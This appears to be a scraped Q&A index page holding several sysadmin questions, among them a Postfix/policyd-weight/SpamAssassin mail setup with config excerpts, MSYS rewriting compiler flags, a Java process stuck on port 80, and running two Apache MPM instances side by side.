    I have a VPS which is originally destined to be a webserver but some minimal mail capabilities are needed to be deployed as well, including sending and receiving as standalone server. The current setup is the following: Postfix reveices the mail, the users are in virtual tables, stored in MySQL on connection all servers are tested with policyd-weight service against some DNSBLs all mail is runs through SpamAssassin spamd with the help of spamc client the mail is then delivered with Dovecot 2' LDA (local delivery agent), virtual users as well As you saw... there's no virus scanner running, and that's for a reason: clamav eats all the memory possible and also, virus mails are all filtered out with this setup (I've tested the same with ClamAV enabled for 1,5 years, no virus mail ever got even to ClamAV) I don't use amavisd and I really don't want to. You only need that monster if you have plenty of memory and lots of simultaneous scanners. It's also a nightmare to fine tune by hand. I run policyd-weight instead of policyd and native DNSBLs in postfix. I don't like to send someone away because a single service listed them. Important statement: everything works fine. I receive very small amount of spam, nearly never get a false positive and most of the bad mail is stopped by policyd-weight. The only "problem" that I feel the services at total uses a bit much memory alltogether. I've already cut the modules of spamassassin (see below), but I'd really like to hear some advices how to cut the memory footprint as low as possible, mostly: what plugins SpamAssassin really needs and what are more or less useless, regarding to my current postfix & policyd-weight setup? SpamAssassin rules are also compiled with sa-compile (sa-update runs once a week from cron, compile runs right after that) These are some of the current configurations that may matter, please tell me if you need anything more. postfix/master.cf (parts only) dovecot unix - n n - - pipe flags=DRhu user=vmail:vmail argv=/usr/bin/spamc -e /usr/lib/dovecot/deliver -d ${recipient} -f {sender} postfix/main.cf (parts only) smtpd_helo_required = yes smtpd_helo_restrictions = permit_mynetworks, reject_invalid_hostname, permit smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_invalid_hostname, reject_non_fqdn_hostname, reject_non_fqdn_recipient, reject_unknown_recipient_domain, reject_unauth_pipelining, reject_unauth_destination, check_policy_service inet:127.0.0.1:12525, permit policyd-weight.conf (parts only) $REJECTMSG = "550 Mail appeared to be SPAM or forged. Ask your Mail/DNS-Administrator to correct HELO and DNS MX settings or to get removed from DNSBLs"; $REJECTLEVEL = 4; $DEFER_STRING = 'IN_SPAMCOP= BOGUS_MX='; $DEFER_ACTION = '450'; $DEFER_LEVEL = 5; $DNSERRMSG = '450 No DNS entries for your MTA, HELO and Domain. Contact YOUR administrator'; # 1: ON, 0: OFF (default) # If ON request that ALL clients are only checked against RBLs $dnsbl_checks_only = 0; # 1: ON (default), 0: OFF # When set to ON it logs only RBLs which affect scoring (positive or negative) $LOG_BAD_RBL_ONLY = 1; ## DNSBL settings @dnsbl_score = ( # host, hit, miss, log name 'dnsbl.ahbl.org', 3, -1, 'dnsbl.ahbl.org', 'dnsbl.njabl.org', 3, -1, 'dnsbl.njabl.org', 'dnsbl.sorbs.net', 3, -1, 'dnsbl.sorbs.net', 'bl.spamcop.net', 3, -1, 'bl.spamcop.net', 'zen.spamhaus.org', 3, -1, 'zen.spamhaus.org', 'pbl.spamhaus.org', 3, -1, 'pbl.spamhaus.org', 'cbl.abuseat.org', 3, -1, 'cbl.abuseat.org', 'list.dsbl.org', 3, -1, 'list.dsbl.org', ); # If Client IP is listed in MORE DNSBLS than this var, it gets REJECTed immediately $MAXDNSBLHITS = 3; # alternatively, if the score of DNSBLs is ABOVE this level, reject immediately $MAXDNSBLSCORE = 9; $MAXDNSBLMSG = '550 Az levelezoszerveruk IP cime tul sok spamlistan talahato, kerjuk ellenorizze! / Your MTA is listed in too many DNSBLs; please check.'; ## RHSBL settings @rhsbl_score = ( 'multi.surbl.org', 4, 0, 'multi.surbl.org', 'rhsbl.ahbl.org', 4, 0, 'rhsbl.ahbl.org', 'dsn.rfc-ignorant.org', 4, 0, 'dsn.rfc-ignorant.org', # 'postmaster.rfc-ignorant.org', 0.1, 0, 'postmaster.rfc-ignorant.org', # 'abuse.rfc-ignorant.org', 0.1, 0, 'abuse.rfc-ignorant.org' ); # skip a RBL if this RBL had this many continuous errors $BL_ERROR_SKIP = 2; # skip a RBL for that many times $BL_SKIP_RELEASE = 10; ## cache stuff # must be a directory (add trailing slash) $LOCKPATH = '/var/run/policyd-weight/'; # socket path for the cache daemon. $SPATH = $LOCKPATH.'/polw.sock'; # how many seconds the cache may be idle before starting maintenance routines #NOTE: standard maintenance jobs happen regardless of this setting. $MAXIDLECACHE = 60; # after this number of requests do following maintenance jobs: checking for config changes $MAINTENANCE_LEVEL = 5; # negative (i.e. SPAM) result cache settings ################################## # set to 0 to disable caching for spam results. To this level the cache will be cleaned. $CACHESIZE = 2000; # at this number of entries cleanup takes place $CACHEMAXSIZE = 4000; $CACHEREJECTMSG = '550 temporarily blocked because of previous errors'; # after NTTL retries the cache entry is deleted $NTTL = 1; # client MUST NOT retry within this seconds in order to decrease TTL counter $NTIME = 30; # positve (i.,e. HAM) result cache settings ################################### # set to 0 to disable caching of HAM. To this number of entries the cache will be cleaned $POSCACHESIZE = 1000; # at this number of entries cleanup takes place $POSCACHEMAXSIZE = 2000; $POSCACHEMSG = 'using cached result'; #after PTTL requests the HAM entry must succeed one time the RBL checks again $PTTL = 60; # after $PTIME in HAM Cache the client must pass one time the RBL checks again. #Values must be nonfractal. Accepted time-units: s, m, h, d $PTIME = '3h'; # The client must pass this time the RBL checks in order to be listed as hard-HAM # After this time the client will pass immediately for PTTL within PTIME $TEMP_PTIME = '1d'; ## DNS settings # Retries for ONE DNS-Lookup $DNS_RETRIES = 1; # Retry-interval for ONE DNS-Lookup $DNS_RETRY_IVAL = 5; # max error count for unresponded queries in a complete policy query $MAXDNSERR = 3; $MAXDNSERRMSG = 'passed - too many local DNS-errors'; # persistent udp connection for DNS queries. #broken in Net::DNS version 0.51. Works with Net::DNS 0.53; DEFAULT: off $PUDP= 0; # Force the usage of Net::DNS for RBL lookups. # Normally policyd-weight tries to use a faster RBL lookup routine instead of Net::DNS $USE_NET_DNS = 0; # A list of space separated NS IPs # This overrides resolv.conf settings # Example: $NS = '1.2.3.4 1.2.3.5'; # DEFAULT: empty $NS = ''; # timeout for receiving from cache instance $IPC_TIMEOUT = 2; # If set to 1 policyd-weight closes connections to smtpd clients in order to avoid too many #established connections to one policyd-weight child $TRY_BALANCE = 0; # scores for checks, WARNING: they may manipulate eachother # or be factors for other scores. # HIT score, MISS Score @client_ip_eq_helo_score = (1.5, -1.25 ); @helo_score = (1.5, -2 ); @helo_score = (0, -2 ); @helo_from_mx_eq_ip_score= (1.5, -3.1 ); @helo_numeric_score= (2.5, 0 ); @from_match_regex_verified_helo= (1,-2 ); @from_match_regex_unverified_helo = (1.6, -1.5 ); @from_match_regex_failed_helo = (2.5, 0 ); @helo_seems_dialup = (1.5, 0 ); @failed_helo_seems_dialup= (2, 0 ); @helo_ip_in_client_subnet= (0,-1.2 ); @helo_ip_in_cl16_subnet = (0,-0.41 ); #@client_seems_dialup_score = (3.75, 0 ); @client_seems_dialup_score = (0, 0 ); @from_multiparted = (1.09, 0 ); @from_anon= (1.17, 0 ); @bogus_mx_score = (2.1, 0 ); @random_sender_score = (0.25, 0 ); @rhsbl_penalty_score = (3.1, 0 ); @enforce_dyndns_score = (3, 0 ); spamassassin/init.pre (I've put the .pre files together) loadplugin Mail::SpamAssassin::Plugin::Hashcash loadplugin Mail::SpamAssassin::Plugin::SPF loadplugin Mail::SpamAssassin::Plugin::Pyzor loadplugin Mail::SpamAssassin::Plugin::Razor2 loadplugin Mail::SpamAssassin::Plugin::AutoLearnThreshold loadplugin Mail::SpamAssassin::Plugin::MIMEHeader loadplugin Mail::SpamAssassin::Plugin::ReplaceTags loadplugin Mail::SpamAssassin::Plugin::Check loadplugin Mail::SpamAssassin::Plugin::HTTPSMismatch loadplugin Mail::SpamAssassin::Plugin::URIDetail loadplugin Mail::SpamAssassin::Plugin::Bayes loadplugin Mail::SpamAssassin::Plugin::BodyEval loadplugin Mail::SpamAssassin::Plugin::DNSEval loadplugin Mail::SpamAssassin::Plugin::HTMLEval loadplugin Mail::SpamAssassin::Plugin::HeaderEval loadplugin Mail::SpamAssassin::Plugin::MIMEEval loadplugin Mail::SpamAssassin::Plugin::RelayEval loadplugin Mail::SpamAssassin::Plugin::URIEval loadplugin Mail::SpamAssassin::Plugin::WLBLEval loadplugin Mail::SpamAssassin::Plugin::VBounce loadplugin Mail::SpamAssassin::Plugin::Rule2XSBody spamassassin/local.cf (parts) use_bayes 1 bayes_auto_learn 1 bayes_store_module Mail::SpamAssassin::BayesStore::MySQL bayes_sql_dsn DBI:mysql:db:127.0.0.1:3306 bayes_sql_username user bayes_sql_password pass bayes_ignore_header X-Bogosity bayes_ignore_header X-Spam-Flag bayes_ignore_header X-Spam-Status ### User settings user_scores_dsn DBI:mysql:db:127.0.0.1:3306 user_scores_sql_password user user_scores_sql_username pass user_scores_sql_custom_query SELECT preference, value FROM _TABLE_ WHERE username = _USERNAME_ OR username = '$GLOBAL' OR username = CONCAT('%',_DOMAIN_) ORDER BY username ASC # for better speed score DNS_FROM_AHBL_RHSBL 0 score __RFC_IGNORANT_ENVFROM 0 score DNS_FROM_RFC_DSN 0 score DNS_FROM_RFC_BOGUSMX 0 score __DNS_FROM_RFC_POST 0 score __DNS_FROM_RFC_ABUSE 0 score __DNS_FROM_RFC_WHOIS 0 UPDATE 01 As adaptr advised I remove policyd-weight and configured postfix postscreen, this resulted approximately -15-20 MB from RAM usage and a lot faster work. I'm not sure it's working at full capacity but it seems promising.

    Read the article

  • How do I stop MSYS from transforming my compiler options?

    - by Carl Norum
    Is there a way to stop MSYS/MinGW from transforming what it thinks are paths on my command lines? I have a project that's using nmake & Microsoft Visual Studio 2003 (yeecccch). I have the build system all ported and ready to go for GNU make (and tested with Cygwin). Something weird is happening to my compiler flags when I try to compile in an MSYS environment, though. Here's a simplified example: $ cl /nologo Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 13.10.6030 for 80x86 Copyright (C) Microsoft Corporation. All rights reserved. /out:nologo.exe C:/msys/1.0/nologo LINK : fatal error LNK1181: cannot open input file 'C:/msys/1.0/nologo.obj' As you can see, MSYS is transforming the /nologo compiler switch into a windows path, and then sending that to the compiler. I really don't want this to happen - in fact I'd be happy if MSYS never transformed any paths - my build system had to take care of all that when I first ported to Cygwin. Is there a way to make that happen? It does work to change the command to $ cl -nologo Which produces the expected results, but this build system is very large and very painful to update. I really don't want to have to go in and change every use of a / for a flag to a -. In particular, there may be tools that don't support the use of the - at all, and then I'll really be stuck. Thanks for any suggestions!

    Read the article

  • Process killing trouble

    - by Aditya Singh
    I am trying to program a server software which involves a lot of testing on java / scala platform. Whenever i compile and execute the code. It starts listening on port 80. Sometimes i need to terminate it by Ctrl+C when it hangs. In that case, ubuntu is not freeing the port. So in order to run the process, i have to restart the machine. I see this at ps aux root 1924 0.0 0.0 5796 1660 pts/0 T 05:44 0:00 sudo scala - root 1925 0.2 1.5 491448 40796 pts/0 Tl 05:44 0:03 java -Xmx256M -Xms16M So process 1924 and 1925. I did sudo kill on both these. But then they keep on persisting even after a long time. sudo nmap -T Aggressive -A -v 127.0.0.1 -p 1-65000 Scanning localhost (127.0.0.1) [65000 ports] Discovered open port 80/tcp on 127.0.0.1 It means its still there ! sudo netstat --tcp --udp --listening --program tcp6 0 0 [::]:www [::]:* LISTEN 1925/java tcp6 0 0 ip6-localhost:ipp [::]:* LISTEN 1185/cupsd This means its 1925 - java How to kill it.

    Read the article

  • Apache2 MPM-prefork MPM-worker multiple instances on same Ubuntu host machine possible?

    - by user60985
    I have a live Apache2/MPM-Worker instance running Django. I want to also run an Apache2/MPM-prefork instance to run some Drupal6 applications on the same host machine and utilize a vast selection of PHP modules that run on the prefork model. I plan to use my MPM-worker instance to reverse proxy to the Apache2-prefork instance for URLS starting with myhost.com/drupal6/. It seems theoretically doable/configurable by having the second Apache2-prefork instance configured to listen on an internal port, say 127.0.0.1:8080 and having my current Apache2-worker configured to proxy pass and reverse pass to it for the 'drupal6' URLs. However, how do I compile or install the apache2-prefork version so it has a different executable name than /usr/sbin/apache2, for example /usr/sbin/apache2p, and so apache2ctl has a different name, say apache2pctl, and that apache2pctl invokes the /usr/sbin/apache2p instead of /usr/sbin/apache2... and so on down the line (eg /etc/apache2p) so I can start and restart my two instances independently? As I understand it, no one executable of 'apache2' can be compiled with both the MPM-prefork and MPM-worker modules, so it seems I need two separate versions of the apache2 MPM flavors. But then I need to invoke and control them by separate names, I assume. I looked at the configuration options for apache2 and I am a bit queasy about compiling a second apache2 version with prefork because I am not sure I can set all the options so that none of my current apache2 files is overwritten. Is there a way? Is there a standard solution to separately installing and controlling prefork and worker apache2 executables on the same machine without them stepping on each other during installation or operation?

    Read the article

< Previous Page | 184 185 186 187 188 189 190 191 192 193 194 195  | Next Page >